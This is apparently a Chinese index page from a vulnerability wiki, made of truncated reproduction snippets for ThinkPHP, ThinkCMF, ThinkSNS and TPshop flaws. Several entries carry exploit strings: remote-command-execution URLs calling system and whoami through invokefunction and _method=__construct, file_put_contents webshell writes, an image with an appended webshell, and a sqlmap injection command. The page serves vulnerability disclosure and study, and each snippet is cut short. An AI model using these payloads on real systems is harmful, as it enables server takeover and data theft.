-
ThinkCMF 缓存Getshell
影响版本
ThinkCMF X1.6.0 ThinkCMF X2.1.0 ThinkCMF X2.2.0 ThinkCMF X2.2.1 ThinkCMF X2.2.2
复现过程
常规操作
http://www.0-sec.org/index.php?a=display&templateFile=README.md&content=%3C?php%2...
-
ThinkSNS V4 后台任意文件下载...
漏洞分析
存在漏洞代码ts4appsadminLibActionUpgradeAction.class.php中的一个函数中。
public function step1()
{
$downUrl = $_GET['upurl'];
$downUrl = urldecode($downUrl);
&nb...
-
Thinkphp 专用shell
漏洞简介
基于thinkphp框架的一句话写法 thinkphp框架使用入口文件调用控制器,直接写一句话可能会有解析问题导致无法执行指令,研究了一下把一句话套入框架控制器的方法,分享给大家参考,
复现过程
在index的控制器文件夹下建立Test.php文件,代码如下:
<?php
namespace appindexcontroller;
class T...
-
Thinkphp Shop后门CVE-2...
漏洞简介
该漏洞源于/vendor/phpdocumentor/reflection-docblock/tests/phpDocumentor/Reflection/DocBlock/Tag/LinkTagTeet.php可以将文件下载到其他服务器上。远程攻击者可利用该漏洞获取敏感信息,并可能执行命令。
影响版本
Backdoor in Tpshop <= 2.0...
-
Thinkphp Shop 供应商后台本...
复现过程
1、用户个人资料修改处上传图片
http://www.0-sec.org/Home/User/info.html
2、上传一张正常图片,并在图片末尾加上一句话
3、返回shell
http://www.0-sec.org/supplier/order/delivery_print?template=public/upload/user/4575/head_pic/5989ee...
-
Thinkphp Shop前台SQL注入...
复现过程
http://www.0-sec.org/mobile/index/index2/id/1'
sqlmap -u "http://www.0-sec.org/mobile/index/index2/id/1*" --random-agent --batch --dbms "mysql" --
-
Thinkphp 3.x order b...
漏洞简介
ThinkPHP在处理order by排序时,当排序参数可控且为关联数组(key-value)时,由于框架未对数组中key值作安全过滤处理,攻击者可利用key构造SQL语句进行注入,该漏洞影响ThinkPHP 3.2.3、5.1.22及以下版本。
影响版本
ThinkPHP 3.2.3、5.1.22及以下版本。
漏洞分析
Think...
-
Thinkphp 3.2.3 缓存漏洞
影响版本
Thinkphp 3.2.3
漏洞分析
直接跟进到/Library/Think/Cache/File.class.php文件,看到set方法:
/**
写入缓存
@access public
@param string $name 缓存变量名
@param mixed $value 存储数据
@param int $expire 有效时间 0为永久...
-
Thinkphp 3.2.3 updat...
漏洞简介
thinkphp是国内著名的php开发框架,有完善的开发文档,基于MVC架构,其中Thinkphp3.2.3是目前使用最广泛的thinkphp版本,虽然已经停止新功能的开发,但是普及度高于新出的thinkphp5系列,由于框架实现安全数据库过程中在update更新数据的过程中存在SQL语句的拼接,并且当传入数组未过滤时导致出现了SQL注入。
影响版本
Thin...
-
Thinkphp 3.2.3 selec...
影响版本
Thinkphp 3.2.3
漏洞分析
通过github上的commit 对比其实可以粗略知道,此次更新主要是在ThinkPHP/Library/Think/Model.class.php文件中,其中对于delete,find,select三个函数进行了修改。
delete函数
select函数
find函数
对比三个方法修改的地方都...
-
Thinkphp 3.1.3 sql注入...
影响版本
Thinkphp 3.1.3
复现过程
首先在网上下载对应的压缩包。
漏洞位于ThinkPHP/Lib/Core/Model.class.php 文件的parseSql函数
将这一条修复语句注释后开始一步步复现
在ThinkPHP目录下创建app文件夹后创建index.php
访问相应页面,显示这个则说明成功。
成功后app文件夹下会生成...
-
Thinkphp 5.0.8 远程命令执...
复现过程
http://wwww.0-sec.org/public
_method=__construct&method=get&filter[]=call_user_func&server[]=phpinfo&get[]=phpinfo
_method=__construct&method=get&filter[]=call_user_fu...
-
Thinkphp 5.0.9 远程命令执...
复现过程
www.0-sec.org/?s=index/index
POST
s=whoami&_method=__construct&method=POST&filter[]=system
aaaa=whoami&_method=__construct&method=GET&filter[]=system
_method=__constr...
-
Thinkphp 5.1.18 远程命令...
1、常规poc
http://www.xxxxx.com/?s=admin/thinkapp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=index11.php&vars[1][1]=<?=file_put_contents('in...
-
Thinkphp 5.1.29 远程命令...
1、代码执行
http://www.0-sec.org/?s=index/thinkRequest/input&filter=phpinfo&data=1
http://www.0-sec.org/?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&...
-
Thinkphp 5.1.x SQL注入...
漏洞简介
在ThinkPHP5.1.23之前的版本中存在SQL注入漏洞,该漏洞是由于程序在处理order by 后的参数时,未正确过滤处理数组的key值所造成。如果该参数用户可控,且当传递的数据为数组时,会导致漏洞的产生。
影响版本
ThinkPHP < 5.1.23
环境搭建
1.下载安装thinkphp5.1.x
对于thinkp...
-
Thinkphp 5.0.24 mysq...
漏洞简介
Thinkphp 5.0.24 在开启debug的模式下,可通过高线程爆破mysql导致tp报错泄露mysql账号密码。
影响版本
Thinkphp 5.0.24
复现过程
利用条件:
开启debug模式
mysql开启外连
通过MySQL爆破工具,来建立大量链接
连接数到达一定的程度以后就会抛出错误
导...
-
Thinkphp 5.0.5 缓存漏洞
漏洞影响
Thinkphp 5.0.5
漏洞分析
漏洞代码与3.2.3差不多,不一样的在缓存目录
protected function getCacheKey($name) { $name = md5($name); if ($this->options['cache_subdir']) { // 使用子目录 $name = sub...
-
ThinkPHP 5.1.25 inse...
漏洞详情
条件:传入上面方法的参数数组,用户可控数组的键值(说到这里,了解tp的其实应该知道是什么原因了,就是sql语句中的字段名可控导致的注入),在实际利用的时候还要知道表的一个字段名。
影响版本
ThinkPHP 5.1.25
影响方法:insert、insetAll、update
漏洞分析
thinkphplibraythinkdbB...
-
ThinkPHP5 聚合查询注入SQL注...
漏洞概要
本次漏洞存在于所有 Mysql 聚合函数相关方法。由于程序没有对数据进行很好的过滤,直接将数据拼接进 SQL 语句,最终导致 SQL注入漏洞 的产生。
漏洞影响版本
5.0.0<=ThinkPHP<=5.0.21
5.1.3<=ThinkPHP5<=5.1.25
不同版本 payload 需稍作调整
5.0.0~5.0.21、 5....
